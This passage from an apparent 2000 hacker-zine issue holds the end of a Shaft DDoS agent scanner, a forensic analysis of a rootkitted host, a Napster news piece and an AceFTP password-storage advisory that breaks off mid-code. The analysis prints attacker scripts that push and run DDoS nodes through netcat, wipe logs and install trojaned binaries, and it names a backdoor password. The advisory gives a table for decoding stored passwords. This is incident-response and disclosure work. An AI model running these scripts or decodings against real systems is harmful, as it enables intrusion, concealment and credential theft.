      {
              int             usock;
              int             i;
              socklen_t       len;    /* recvfrom() expects socklen_t, not int */
              fd_set          fdset;
              char            buf[BS];
              char            rcmd[BS], filler[BS], rpass[BS];
              struct timeval  timi;
              struct udppkt_t
                              upacket;
              struct sockaddr_in
                              sa, from;
      
              /* child becomes a listener process */
      
              if ((usock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
                      perror("cannot open raw UDP listen socket");
                      exit(1);
              }
      
              bzero((char *) &sa, sizeof(sa));
              sa.sin_family = AF_INET;
              sa.sin_addr.s_addr = INADDR_ANY;
              sa.sin_port = htons(shaft_rctport);
      
              if (bind(usock, (struct sockaddr *)&sa, sizeof(sa)) < 0) {
                      perror("cannot bind to socket");
                      exit(-1);
              }
        
              while (1) {
                      /* if parent has exitted, die */
                      if(getppid() == 1)
                              exit(0);
      
                      FD_ZERO(&fdset);
                      FD_SET(usock, &fdset);
                      timi.tv_sec = 1;
                      timi.tv_usec = 0;
                      select(FD_SETSIZE, &fdset, NULL, NULL, &timi);
                      usleep(100);
                      if (FD_ISSET (usock, &fdset)) {
                              /* read data from UDP listen socket */
                              memset((void *) &upacket, 0, sizeof(struct udppkt_t));
                              len = sizeof(from);
      #if 1
                              if ((i = recvfrom(usock, buf, BS - 1, 0,
                                      (struct sockaddr *) &from, &len)) < 0) {
                                      perror("recvfrom");
                                      continue;
                              }
      #else
                              i = read (usock, (char *) buf, BS) -
                                      (sizeof (struct ip) + sizeof (struct udphdr));
      #endif
                              /* a datagram is not a C string: terminate it so the
                                 strstr() below cannot run past the received bytes */
                              buf[i] = '\0';
                              sa.sin_addr.s_addr = upacket.ipi.ip_src.s_addr;
                              if(dflg)
                              fprintf(stderr,
                                      "Listener got a UDP packet on port %d\n",
                                      shaft_rctport);
      
                              /* shaft check */
                              if (strstr(buf,shaft_echostr)) { 
                                      printf("Received '%s' from %s",
                                              shaft_echostr,
                                              inet_ntoa(from.sin_addr));
                                      printf(" - probable shaft agent\n");
                              }
                              else {
                                      printf("Unexpected UDP packet received on port %d from %s\n",
                                              shaft_rctport, inet_ntoa(from.sin_addr));
                              }
                      }
              }
      }
      
      
      static int
      usage()
      {
              fprintf(stderr,"usage: dds [options] <target>\n");
              fprintf(stderr,"target is CIDR block to scan in form:\n");
              fprintf(stderr,"\tA.B.C.D/mask\n");
              fprintf(stderr,"Options:\n");
              fprintf(stderr,"\t[-v] turns on verbosity\n");
              fprintf(stderr,"\t[-d] turns on debugging\n");
              fprintf(stderr,"\t[-s] interpacket sleep in microseconds\n");
              fprintf(stderr,"\t[-S] delay for late packets\n");
      
              return(1);
      }
      
      ---
      Dr. Sven Dietrich        Raytheon ITSS  | spock@sled.gsfc.nasa.gov 
      ESDIS Project, Code 586, Blg 32 Rm N231 | +1-301-614-5119 | 614-5270 Fax
      NASA Goddard Space Flight Center        | Greenbelt, MD 20771, USA
      
      @HWA      
      
      
111.1 Shaft Node/Master analysis by Rick Wash & Jose Nazario
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: PSS
      
      
                                 ---[      ]---
      
                       Analysis of a Shaft Node and Master
                                 March 26, 2000
      
                                 ---[      ]---
      
      Rick Wash
      rlw6@po.cwru.edu
      
      Jose Nazario
      jose@biocserver.cwru.edu
      
      
      Section 0: Introduction
      =======================
      
      This analysis is in addition to Sven Dietrich's analysis, dated March 16, 2000,
      of the Shaft DDoS tool.  The analysis we provide here is a description of the
      rootkit used and the methods of distribution of the tool. We share this
      information so that other site and system administrators can examine their
      systems for compromise and use as Shaft nodes.
      
      Note:  This file can be found at:
        http://biocserver.cwru.edu/~jose/shaft_analysis/
      
      The user names and host ID's have been munged.  We have tried to contact the
      domain admins whose networks have appeared anywhere in any of these files.
      
      ---------[ How We Found This Information
      
      Once we were alerted that our machine may have been compromised, we performed
      both network and host based scans.  A network port scan (using nmap) revealed
      port 5002/tcp open and listening.  Furthermore, it revealed port 22/tcp (ssh)
      open, which was not installed by the system administrator.
      
      A host based scan revealed similarly that port 5002/tcp was listening.  An
      analysis with rpm -Va revealed differences in sizes and MD5 sums for the
      components of the root kit, but did not reveal the Shaft toolkit.  At this time
      the system was taken offline and the disk was mounted in another trusted system
      and analyzed from there.
      
      Local administrators had noted that the system had become unstable over autumn,
      corresponding to the tests of the Shaft DDoS tool.
      
      
      Section 1:  The Rootkit Used
      ============================
      
      ----------------[ What We Found
      
      One of the significant things we found while analyzing the box was a directory
      and set of files that I will call the sda69 toolkit.  It was found in /dev
      (/dev/sda69 and 4 files sda69[a-d]).  This appears to be the attackers' working
      directory, so most of their scripts and files are stored there.
      
      It appears that much of their older work from when they originally compromised
      the box was stored in a subdirectory called ". " (dot space, "/dev/sda69/. ").
      This directory contained 6 files that comprised a system for sniffing the
      ethernet network and analyzing the sniffer logs.  Here is a list of files and
      what they do:
      
        -rwxr-xr-x   1 0        20          28969 Apr  4  1999 idle
      
      This was their sniffer.  It was designed to sniff ports 21/tcp and 23/tcp (ftp
      and telnet, respectively).  It would capture the first x number of bytes of each
      connection, log them to a file, and move on to the next connection.  This was
      used to gather passwords, since both ftp and telnet send passwords in
      plaintext.  This sniffer only logged in one direction (the data flowing from
      the machine that started the connection to the destination machine).  This was
      done because the other direction rarely contains useful information.  The
      output file in this case was tcp.log.  The program was named idle probably to
      fool any sysadmin who noticed it in ps and make them believe it was just idle
      time.
      
        -rw-r--r--   1 0        0          456799 Jun 11  1999 tcp.log
      
      This was their sniffer log.  It contained data in the form:
      src_ip => dst_ip [port]
      data
      ...
      
      ----- [method of connection termination]
      This log only contained information for ports 21 and 23.  It did also contain a
      number of passwords.
      
        -rwxr-xr-x   1 0        0            2795 May 12  1999 pp.pl
      
      This was a perl script that extracted usernames and passwords from their
      sniffer log files.
      
        -rw-r--r--   1 0        0               6 Apr 28  1999 sniff.pid
      
      This is a standard pid lock file for the sniffer.
      
        -rw-r--r--   1 0        20           7654 Apr  4  1999 s
      
      A simple SYN flood program.
      
        -rwxrwxr-x   1 0        0            7656 Aug 28  1998 chattr
      
      This is the standard linux chattr program, linked dynamically against libc6.
      
      This material in ". " shows that the attackers did use this box for sniffing
      passwords from the ethernet network that it was connected to.  It is currently
      unknown if the attackers did anything else during this time frame (May-June
      1999).
      
      --------[ Linux Trojan Horse Programs Found
      
      Investigation of the Linux host compromised yielded the following trojan
      horse programs. They were found by mounting the disc read-only and without
      executable permissions set. A full recursive file listing was then
      performed (ls -lartRi /mnt) which quickly revealed the trojan horse binaries:
      
        20563 -rwxrwxr-x   1 root     root       437428 Sep 15  1998 vi
        20554 -rwxrwxr-x   1 root     root       262756 Oct  2  1998 tcsh
       313370 -r-xrwxr-x   1 root     root        31312 Oct  3  1998 ps
      
      Examination of the binaries using strings(1), together with additional files
      on the system, reveals the method of operation of the new binaries.
      
      The file sizes were sometimes larger, most likely due to being statically
      linked against an older C library (libc5 on a libc6 system).
      
      On a running host, examination by using RPM in verify mode (rpm -Va) showed
      file sizes, permissions and MD5 sums were off when compared to the database
      on the system.
      
              ls
      
      The ls trojan we found has the effect of not listing files listed in a
      hidden configuration file, /dev/sda69c. As such, it's highly extensible.
      Several utilities were hidden, including elements of the Shaft toolkit and
      even some terminals.
      
              netstat
      
      Examination of the replaced netstat binary reveals that it is used to
      hide connections to or from certain networks and on certain ports. The
      networks and ports were configured using the file /dev/sda69b, an additional
      element of the rootkit.
      
              ps
      
      Again, used to hide activity. The trojan horse ps(1) binary makes a reference
      to the file /dev/sda69a, which contains a listing of processes and terminals
      to hide. A fairly typical rootkit listing, including sniffers, scanners,
      the eggdrop IRC script, and the backdoored sshd.
      
              updatedb
      
      The program updatedb(1L), normally a link to slocate(1), was replaced with a
      shell script. Again, used to hide signs of the rootkit tools.
      
              locate
      
      Similar to updatedb's trojan, used to hide the rootkit and Shaft toolkit.
      
              find
      
      Again, used to hide the toolkits, calls the file /dev/sda69c in a similar
      way to the ls trojan to hide files.
      
              dir
              vdir
      
      See ls, used in the same fashion.
      
              killall
      
      Replaced, calls /dev/sda69a, a listing of processes and terminals. Used to
      prevent the halting of the intruder's processes.
      
              syslogd
      
      Replaced, calls /dev/sda69d, a list of domains. Presumably it prevents logging
      when hosts from these domains connect.
      
              tcpd
      
      The TCP wrappers executable, calls /dev/sda69b and prevents access checking
      from those networks and on those ports.
      
              inetd
      
      Appears to be a combined portmapper and inetd daemon, perhaps to allow for
      access or system control via RPC calls.
      
              sshd
      
      Trojaned sshd 1.2.26, statically linked against libc5.  Contains a backdoor
      password "rOOTkIT" which yields a root shell without logging.
      
              ifconfig
      
      Replaced, with the trojan version omitting any reporting of the PROMISC
      setting, hiding the use of the sniffing software.
      
      
      -----------[ Solaris SPARC Trojans Found
      
      During the course of our investigation into the toolkit, we also found several
      key binaries for Solaris as trojan horse programs. Within the archive (neet.tar)
      there is a script plus several binary replacements for the SPARC architecture.
      The script installs an inetd trojan, and a ps and update trojan as well. These
      are then run. Log wiping is also done. System compromise is presumably
      through a known exploit. We performed no real analysis on the trojan horse
      programs for SPARC as we did not examine a Solaris node of the Shaft tool.
      
      
        -rwx------   1 510      510         39544 Mar 18  1999 doc
      
      This appears to be their trojaned SPARC Solaris inetd binary.
      
        -rwx------   1 510      510         24356 Mar 18  1999 ps
      
      This appears to be their trojaned SPARC Solaris ps binary.
      
        -rwx------   1 510      510         25548 Mar 18  1999 update
      
      Solaris does not use update, though SunOS 4.x did. This is probably to
      confuse the administrator should they stumble across the file. According to
      George Weaver <weaver@gabriel.nso.psu.edu> this is a standard solsniffer, a
      Solaris sniffer. The logfiles are expected to be in /usr/man/tmp/output on
      infected Solaris boxes.
      
      
      ----------[ Trojan Executable Configuration Files
      
      In addition to these files, four more files were recovered that appear to
      contain information used by the rootkit that was installed on this system.
      These files are /dev/sda69[a-d].  Here is a listing of what is contained in
      these files:
      
        sda69a
      
      This file has the format:
      <number> <name>
      where number indicates what type of information follows (always either 1 or 3)
      and name indicates the data.  For this file, 1 indicates that what follows is a
      terminal name, and 3 indicates that what follows is an executable name.  This
      file is used by the trojaned ps and killall to prevent the sysadmin from seeing
      or killing the executables listed here, or anything from the listed terminals.
      The contents of the file:
      
      3 egg
      3 linsniffer
      1 p0
      1 p1
      3 sniffer
      3 mscan
      3 bash
      3 idle
      3 screen
      3 ssynk4
      3 sshd
      3 ssh
      3 sshd1
      3 s
      
        sda69b
      
      The format of this file is the same as the format of sda69a, but the contents
      differ.  The 1 in this case means that the data is a subnet to ignore.  The 3
      in this case is a specific port number.  This file is used by the trojaned
      netstat and tcpd to know which IP's to hide, which IP's to always let in,
      and which ports to hide.  An example contents follows:
      
      
      1 xxx.
      3 6667
      1 yyy.
      3 23
      1 zzz.
      1 ddd.eee
      1 ccc.
      3 513
      1 bbb.aaa.
      3 22
      
      Here, the three letter combinations represent single numbers from IP addresses.
      This file would specify that everyone from xxx.*.*.* would be allowed into this
      machine, and no connections from these IP's would appear in netstat.  Also,
      programs listening on ports 6667, 23, 513, and 22 (irc, telnet, rlogin, and
      ssh) would not appear in a normal netstat.
      
        sda69c
      
      This file is a list of files, one file per line, that were installed on this
      system by the attackers.  This file is used by ls, dir, vdir, and find to know
      what files not to list when the admin tries to look through the filesystem.
      
        sda69d
      
      This file is a list of providers, one per line.  This file is used by the
      trojaned syslog to know what messages should not be logged.
      
      
      Section 2: Distribution Methods of the Shaft Toolkit
      ====================================================
      
      Their more recent work (which includes working with the Shaft DDoS tool) is all
      in the base sda69 directory (/dev/sda69).  Here is a list of files recovered
      and what they do:
      
        -rwxr-xr-x   1 0        0           25123 Nov 28 14:34 shaftmaster
        -rwxr-xr-x   1 0        0           15184 Nov 28 14:47 shaftnode
      
      These are the master and node executables for the Shaft DDoS tool.  For more
      information, see: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt
      
        -rwxr-xr-x   1 0        0           19806 Nov 28 14:41 shaftnode.c
      
      This is the source file for the Shaft node program.  More information can be
      found at the same location as above.
      
        -rwxr-xr-x   1 0        0          165632 Nov 28 16:34 nc
      
      This appears to be the standard netcat executable. This executable was
      used by the scripts to remotely execute commands.
      
        -rw-r--r--   1 0        0             596 Nov 28 17:12 hitlist
      
      This file contains a list of target machines, one machine per line. These
      were evidently targets to receive the shaftnode program, having previously
      been compromised.
      
        -rwxr-xr-x   1 0        0              84 Nov 28 16:36 dos.sh
      
      This shell script runs the command dospipe.sh and sends the output to each of
      the IP's in the file hitlist, port 21 (ftp).  This script is a wrapper around
      dospipe.sh that executes it for each of the machines in hitlist and sends it to
      the machine.  Here is the code from that file:
      
      #!/bin/sh
      for i in `cat hitlist` ; do (./dospipe.sh | ./nc -p 53982 $i 21 &) ; done
      
        -rwxr-xr-x   1 0        0             186 Nov 28 16:41 dospipe.sh
      
      This shell script outputs a series of commands that are intended to upload and
      run a copy of their shaftnode executable to the target machine.  This script
      automates the process of uploading and running their node executables.  Here is
      the code for the script:
      
      #!/bin/sh
      echo "oir##t"
      echo "QUIT"
      sleep 5
      echo "cd /tmp"
      sleep 5
      echo "rcp user@host:shaftnode ./"
      sleep 5
      echo "chmod +x shaftnode"
      sleep 5
      echo "./shaftnode"
      echo "exit"
      
      The first couple of lines (the first two echo commands) appear to signify that a
      backdoor is being used on the target machines' ftp servers to get the root shell
      they need.  The first two lines are sent to the trojaned ftp server, and the
      following lines appear to be commands sent to a root shell.
      
        -rwxr-xr-x   1 0        0          122880 Oct 24 02:13 duh.tar
      
      This is a tar file archive of the next five files: bd.sh, bdpipe.sh, massbd.sh,
      neet.tar and unf.
      
        -rwxr-xr-x   1 0        0             104 Oct 24 01:55 unf
      
      This file is another list of IP's, presumably a list of targets for this "bd"
      system.
      
        -rwxr-xr-x   1 0        0           10240 Oct 24 02:11 bd.sh
      
      This, despite its file extension, is a tar file containing the two files
      bdpipe.sh and massbd.sh.  I believe that this being a tar file is a mistake and
      that it should be a shell script that resembles the script dos.sh.
      
        -rwxr-xr-x   1 0        0              53 Aug  7  1999 massbd.sh
      
      This is a shell script that iterates through all of the lines in a file and
      runs the script bd.sh on each of them in the background.  This means that it
      runs bd.sh on each of the lines in the file roughly at the same time.  I
      suppose that the file unf is used for this purpose.  Here is the code for the
      script:
      
      #!/bin/sh
      for i in `cat $1`; do (./bd.sh $i &);done
      
        -rwxr-xr-x   1 0        0             192 Aug  8  1999 bdpipe.sh
      
      This is a file that is used to upload and install their trojans and rootkits on
      a SPARC machine, as well as delete the logs and such.  It copies neet.tar over
      to the target machine, runs the script bd, and cleans up their work.  Here is
      the code for the script:
      
      #!/bin/sh
      echo "cd /tmp;"
      echo "rcp user@host:neet.tar ./;"
      sleep 4
      echo "tar -xvf neet.tar;"
      sleep 4
      echo "./bd;"
      sleep 10
      echo "rm -rf neet.tar bd update*;"
      sleep 10
      echo "exit;"
      
      It appears that they already have a root shell by the time this script is run.
      Getting the root shell could very well be the contents of the real bd.sh.
      
        -rwxr-xr-x   1 0        0          102400 Aug  7  1999 neet.tar
      
      This is a tar file that contains 4 other files: bd (a shell script), ps,
      update, and doc (three SPARC executables).
      
        -rwx------   1 510      510          1076 Aug  5  1999 bd
      
      This is a shell script.  This is the executable that is run by the other
      scripts once a system is compromised.  This script does a number of things.
      First of all it copies in its trojaned version of inetd.  Secondly it removes
      most of the log files on the system that would implicate them.  Then it runs
      their trojaned inetd and tests it with a telnet session (presumably to test the
      backdoor).  Then it kills inetd, nfs, and ttdb.  Next it runs their update
      program. Finally it copies their ps program to replace the current system one.
      Here is the full source of this script:
      
      unset HISTFILE; unset SAVEHIST
      cp doc /usr/sbin/inetd;
      chown root /usr/sbin/inetd;
      chgrp root /usr/sbin/inetd;
      touch 0716000097 /usr/sbin/inetd;
      rm -rf doc /tmp/bob /var/adm/messages /usr/lib/nfs/statd /usr/openwin/bin/rpc.ttdb* /usr/dt/bin/rpc.ttdb*
      rm -rf /var/log/messages /var/adm/sec* /var/adm/mail* /var/log/mail* /var/adm/sec*
      rm -rf /usr/openwin/bin/rpc.cmsd
      rm -rf /usr/dt/bin/rpc.cmsd
      /usr/sbin/inetd -s;
      /usr/sbin/inetd -s;
      telnet localhost;
      /usr/sbin/inetd -s;
      ps -ef | grep inetd | grep bob | awk '{print "kill -9 " $2 }' > boo
      chmod 700 boo
      ./boo
      ps -ef | grep nfs | grep statd | awk '{print "kill -9 " $2 }' > boo
      chmod 700 boo
      ./boo
      ps -ef | grep ttdb | grep -v grep  | awk '{print "kill -9 " $2 }' > boo
      chmod 700 boo
      ./boo
      rm -rf boo
      mkdir /usr/man/tmp
      mv update ps /usr/man/tmp
      cd /usr/man/tmp
      echo 1 \"./update -s -o output\" > /kernel/pssys
      chmod 755 ps update
      ./update -s -o output &
      cp ps /usr/ucb/ps
      mv ps /usr/bin/ps
      touch 0716000097 /usr/bin/ps /usr/ucb/ps
      cd /
      ps -ef | grep bob | grep -v grep
      ps -ef | grep stat | grep -v grep
      ps -ef | grep update
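
      The bd script above leaves a fixed set of traces behind: the sda69 files, the
      ". " directory, /kernel/pssys, the solsniffer log under /usr/man/tmp, and
      system binaries whose mtime was reset with "touch 0716000097". As an added
      example (not from the analysis or its authors), the Python below runs an
      offline triage pass over a read-only mounted image for exactly those traces.
      Reading 0716000097 as the Solaris MMDDhhmm[yy] form (1997-07-16 00:00 local
      time) is my interpretation of the script; the sample image is constructed.

```python
"""Offline triage for the sda69 kit and bd script traces on a mounted image.
Added example; the sample image is built in a temporary directory."""
import os
import tempfile
import time
from pathlib import Path
from typing import Dict, List

# bd runs "touch 0716000097" on the replaced inetd and ps. Taken as the Solaris
# MMDDhhmm[yy] form (my reading, not stated in the analysis) that is
# 1997-07-16 00:00 local time; an exact match on a system binary is a strong hint.
STOMP_MTIME = int(time.mktime((1997, 7, 16, 0, 0, 0, 0, 0, -1)))

# Paths named in the analysis, relative to the mount point.
INDICATOR_PATHS = [
    "dev/sda69", "dev/sda69a", "dev/sda69b", "dev/sda69c", "dev/sda69d",
    "kernel/pssys",          # written by bd to restart the sniffer
    "usr/man/tmp/output",    # solsniffer log location
]
WATCH_BINARIES = ["usr/sbin/inetd", "usr/bin/ps", "usr/ucb/ps"]


def _suspicious_name(name: str) -> bool:
    """Names made only of dots and spaces (". ") or carrying trailing blanks."""
    return name != name.strip() or set(name) <= {".", " "}


def triage(mount: Path) -> Dict[str, List[str]]:
    """Scan a mounted image; returns findings grouped by type, each list sorted."""
    findings: Dict[str, List[str]] = {"indicator_paths": [], "timestomped": [], "hidden_dirs": []}
    for rel in INDICATOR_PATHS:
        if (mount / rel).exists():
            findings["indicator_paths"].append(rel)
    for rel in WATCH_BINARIES:
        p = mount / rel
        if p.exists() and int(p.stat().st_mtime) == STOMP_MTIME:
            findings["timestomped"].append(rel)
    for root, dirs, _files in os.walk(mount):
        for d in dirs:
            if _suspicious_name(d):
                findings["hidden_dirs"].append(os.path.relpath(os.path.join(root, d), mount))
    for hits in findings.values():
        hits.sort()
    return findings


def build_sample_image() -> Path:
    """Constructed image: some of the artefacts described above beside clean files."""
    root = Path(tempfile.mkdtemp(prefix="shaft_triage_"))
    for rel in ["dev/sda69/. ", "usr/sbin", "usr/bin", "kernel", "usr/man/tmp", "etc"]:
        (root / rel).mkdir(parents=True)
    (root / "dev/sda69a").write_text("3 idle\n1 p0\n")
    (root / "dev/sda69/. /idle").write_bytes(b"\x7fELF")
    (root / "kernel/pssys").write_text('1 "./update -s -o output"\n')
    (root / "usr/man/tmp/output").write_text("")
    (root / "etc/passwd").write_text("root:x:0:0::/:/bin/sh\n")
    inetd = root / "usr/sbin/inetd"
    inetd.write_bytes(b"\x7fELF")
    os.utime(inetd, (STOMP_MTIME, STOMP_MTIME))   # as bd's touch would leave it
    (root / "usr/bin/ps").write_bytes(b"\x7fELF")  # untouched, keeps a current mtime
    return root


if __name__ == "__main__":
    for kind, hits in triage(build_sample_image()).items():
        print(f"{kind}: {hits}")
```

      The mtime check is the part worth keeping even after the paths change: a
      replaced binary dated to the second like its neighbours from the same kit is
      hard to explain any other way.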
      
      
      Section 3: What You Can Do
      ==========================
      
      We have, we hope, outlined methods for administrators to examine their
      systems for compromise by the distributors of the Shaft DDoS tool. A
      combination of a generic rootkit together with the DDoS package created
      a ring of machines which could be used to disrupt large network segments.
      
      The most important thing is what is repeatedly said -- apply the vendor
      patches for security updates and keep your system current. Access was gained,
      no doubt, through well known holes which had patches released some time before
      by the vendor. This simple action would have prevented most of the nodes
      of the tool from being acquired.
      
      Secondly, any alert system administrator would have noticed the performance
      of the machine degrade for no apparent reason. The local administrators of
      this node complained of crashes and performance problems of this server, yet
      were not qualified administrators. This is a standard problem, and one that
      can be easily avoided by training or hiring competent administrators.
      
      While the steps we outlined above are above these simple, basic system level
      administration actions, prevention of this kind of compromise is easily
      done. Any organization should facilitate the spread of vendor supplied
      security patches.
      
      As noted in the introduction, we have attempted to contact the administrators
      of the domains listed in the target lists for the distribution of the toolkit
      or in the records of where the intruders connected. We are providing this
      analysis to the community in an effort to facilitate the cleanup from this
      ring of intrusions. It spreads worldwide, including Europe and the Pacific
      Rim, focusing largely on academic institutions. We have appreciated the
      response from the community when contacted, and offer to help in any additional
      ways.
      
      Special thanks to George Weaver from PSU for some of his analysis on the SPARC
      trojans we found.
      
      Section 4: Selected References
      ==============================
      
      Dietrich, Sven: Shaft Analysis: http://sled.gsfc.nasa.gov/~spock/shaft_analysis.txt
      
      nmap  http://www.insecure.org/nmap
      
      netcat  ftp://coast.cs.purdue.edu/pub/tool/unix/netcat
      
      
      
      


      @HWA
      
            
112.0 Wrapster, the Napster hack fires up the trading fires.
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Submitted by: Dragos Ruiu
      
      
      (You didn't have to stare too hard at the crystal ball to see this
      one coming.  Or the truly anonymous napster clones a la gnutella
      that will be next.  --dr)

      Napster hack allows free distribution of software, movies 
      By John Borland Staff Writer, CNET News.com March 22, 2000, 4:15 p.m. PT 

      A new program has been posted on the Internet that transforms 
      a popular music-trading network into a full-blown online swap meet capable 
      of trading videos and software.

      The program, dubbed Wrapster, has been available for downloading since 
      yesterday. According to its developer, Wrapster allows any kind of file to 
      be listed and traded over the Napster network, which was designed to 
      recognize only MP3 music files. 

      CNET News.com was able to use the program to locate and download several 
      different types of files through Napster. A source at Napster said company 
      executives are aware of Wrapster but have not done anything to block its 
      use. 

      Wrapster joins a growing list of programs allowing the quick, free and 
      wide distribution of illegally copied files. The trend is bad news for 
      record companies, movie studios and software companies that have fought 
      hard to keep their wares from being pirated online. 

      Programs such as Wrapster and Nullsoft's Gnutella, which mimic and expand 
      on Napster, are quickly speeding the erosion of copyright protections 
      online, leaving copyright holders scrambling to keep up. 

      "(Copyright holders) are aggressively pursuing the issue in the courts," 
      said Peter Schalestock, an attorney with Perkins Coie. "They'd like to 
      keep up with the technology, but that is turning into an arms race." 

      Napster, a program designed to let Internet users swap music files with 
      one another, has quickly moved to the heart of the controversy over 
      pirated music and online copyrights. The software allows people to share a 
      library of MP3 music files with anyone else on the Napster system and to 
      freely download songs directly from others' computers. 

      Napster's ease of use and the huge selection of music available through 
      the system have made it a favorite among college students and other 
      communities with high-speed Internet connections. Thousands of people can 
      frequently be found on the network in the evenings, often sharing nearly a 
      million songs with their peers. 

      This has infuriated the recording industry, which views Napster as a tool 
      for piracy. The Recording Industry Association of America (RIAA) has sued 
      the company, charging that its software is facilitating the illegal 
      distribution of material. The industry is asking courts for a potentially 
      huge sum of $100,000 per illegally distributed song. 

      "The overwhelming majority of the MP3 files offered on 
      Napster are infringing," the RIAA says on a Web page explaining its 
      position. "We believe Napster knows this and even encourages it." 

      To this point, the turmoil has been caused simply by the distribution of 
      music files. Wrapster raises the stakes, however. 

      The Wrapster program tricks the Napster software into thinking that any 
      file or set of files, including items such as software, videos or games, 
      are MP3 files. 

      Its author, identified as "Octavian" in the program's "about" file, 
      suggests using the software as a means for trading programs such as 
      Windows 2000. Octavian could not be reached for comment. 

      While aware of Wrapster, executives at Napster do not yet see it as a 
      problem. 

      "They really see it as something that's benign right now," said Dan Wool, 
      a spokesman for Napster. "Until it poses some kind of problem, they'll 
      just keep the status quo." 

      Napster proponents note that Wrapster's search capabilities aren't unique 
      online. A less well-known program dubbed iMesh allows people to swap 
      music, video and other multimedia files. That provides a broader range of 
      options than Napster itself, which only supports MP3 files, but falls 
      short of the capabilities of the new Wrapster technique. 

      The software also has spawned imitators offering expanded features. 
      Programmers at Nullsoft, the digital music player company recently 
      acquired by America Online, unveiled an open-source effort that, like 
      Wrapster, would allow any kind of file to be shared. Although AOL quickly 
      pulled the project from its site, the code is available elsewhere, and the 
      project may move ahead independently. 

      "Other programs have already tried to imitate Napster's system and even 
      taken it a step further," said Wayne Chang, a Haverhill, Mass., student 
      who manages Napster's online community bulletin boards. "Wrapster is just 
      ripping off the same idea, except this time disguising the files as the 
      only media that Napster currently recognizes." 

      The movie and software industries are watching the RIAA's experience 
      closely, aware that they'll ultimately be subjected to the same pressure. 
      They don't face the same risk of widespread piracy today because 
      high-speed Internet connections still aren't common enough to make 
      numerous downloads of their products feasible. 

      An audio MP3 file generally takes up to half an hour to download over a 
      dial-up connection and just seconds over a cable or DSL modem. A file such 
      as Windows 2000 or a Hollywood movie, however, could take all day over an 
      ordinary modem and potentially hours even over a fast connection. 

      Nevertheless, the studios and software manufacturers are doing their best 
      to protect their works against copying and to threaten potential pirates 
      with high-stakes lawsuits. 

      "It's an arms race as long as someone is trying to get around (copyright 
      protections)," said Rich Taylor, vice president of public affairs for the 
      Motion Picture Association of America (MPAA). "The only things that are 
      preventing a full-blown explosion of video entertainment on the Net are 
      the lack of high-speed connections and the need to secure that digital 
      product."  

      
      -- dursec.com / kyx.net - we're from the future                      
      http://www.dursec.com learn kanga-foo from security experts: CanSecWest - 
      May 10-12 Vancouver 

      Speakers: Ken Williams/E&Y, Marty Roesch/Hiverworld, Fyodor/insecure.org,
                RainForestPuppy/wiretrip.net, Theo de Raadt/OpenBSD, 
                Max Vision/whitehats.com
                
      @HWA          
                 
113.0 AceFTP vulnerability by Armour
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source: Armour (email)
      http://www.2600.org.au/advisories/aceftp-032000.txt
      
      

      Vulnerability in AceFTP's Password Storage
      -------------------------------------------
      
      by Armour - March 2000
      
      Intro:
      ------
      Following black-hand's advisory from November 1999/January 2000 on password
      storage, it was discovered that AceFTP uses a similar character substitution
      for local storage of user passwords.
      
      Such storage is no better than a plaintext file containing the passwords.
      
      
      Applies to:
      -----------
      
      AceFTP 2.4a - not tested on earlier versions.
      
      
      Discussion:
      -----------
      
      AceFTP stores user passwords in the Sites.ini file, typically located at:
      
              (C:\Program Files\AceExpertFTP\Sites.ini)
      
      Exploit:
      --------
      
      Entering a password of abcdefghijklmnopqrstuvwxyz, we are able to derive
      the letter substitution, printed below:
      
      A= CB
      B= C8
      C= C9
      D= CE
      E= CF
      F= CC
      G= CD
      H= C2
      I= C3
      J= C0
      K= C1
      L= C6
      M= C7
      N= C4
      O= C5
      P= DA
      Q= DB
      R= D8
      S= D9
      T= DE
      U= DF
      V= DC
      W= DD
      X= D2
      Y= D3
      Z= D0
      
      Here are the contents of a sample Sites.ini file:
      
      [multu]
      Host=hhhh
      Anonymous=0
      User=h
      SavePassword=1
      Password=�CBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0
      HostFolder=
      Port=21
      Firewall=1
      LocalFolder1=
      LocalFolder2=
      LocalFolder3=
      Comments=""
      
      Working backwards with the substitution table above, we find that
      �CBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0 represents
      abcdefghijklmnopqrstuvwxyz.
      
      If an intruder has network or physical access to the Sites.ini file on your
      hard drive, then your passwords are compromised. The intruder will be
      able to extract all necessary information from the file to break into 
      your account(s).
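      The reversal above, turned into an audit check (added here by the editor, not
      Armour's code): it walks a Sites.ini, lists every entry saved with SavePassword=1
      and decodes the stored value with the published table, showing the file is as
      good as plaintext. It assumes the sample file above with the stray leading byte
      replaced by a '?' placeholder, and records the editor's own observation, not
      stated in the advisory, that every table entry is the letter's ASCII code XOR 0xAA.

```python
"""Editor's added example (not Armour's code): audit an AceFTP 2.4a Sites.ini
for saved passwords and show that the stored form is trivially reversible."""
import configparser

# Substitution table exactly as published in the advisory above: the lowercase
# letters that were entered map to these two-hex-digit values in Sites.ini.
SUBSTITUTION = {
    "a": "CB", "b": "C8", "c": "C9", "d": "CE", "e": "CF", "f": "CC", "g": "CD",
    "h": "C2", "i": "C3", "j": "C0", "k": "C1", "l": "C6", "m": "C7", "n": "C4",
    "o": "C5", "p": "DA", "q": "DB", "r": "D8", "s": "D9", "t": "DE", "u": "DF",
    "v": "DC", "w": "DD", "x": "D2", "y": "D3", "z": "D0",
}
REVERSE = {code: letter for letter, code in SUBSTITUTION.items()}
HEX_DIGITS = set("0123456789ABCDEF")

# Constructed copy of the advisory's sample file; the stray non-hex byte that
# precedes the hex digits in the original is replaced by a '?' placeholder.
SAMPLE_SITES_INI = """[multu]
Host=hhhh
Anonymous=0
User=h
SavePassword=1
Password=?CBC8C9CECFCCCDC2C3C0C1C6C7C4C5DADBD8D9DEDFDCDDD2D3D0
HostFolder=
Port=21
Firewall=1
LocalFolder1=
LocalFolder2=
LocalFolder3=
Comments=""
"""


def hex_payload(stored):
    """Drop the leading non-hex byte(s) and return an even-length hex string."""
    s = stored.upper()
    i = 0
    while i < len(s) and s[i] not in HEX_DIGITS:
        i += 1
    s = s[i:]
    return s[: len(s) // 2 * 2]


def decode_with_table(stored):
    """Reverse the substitution with the published table; '?' marks a pair the
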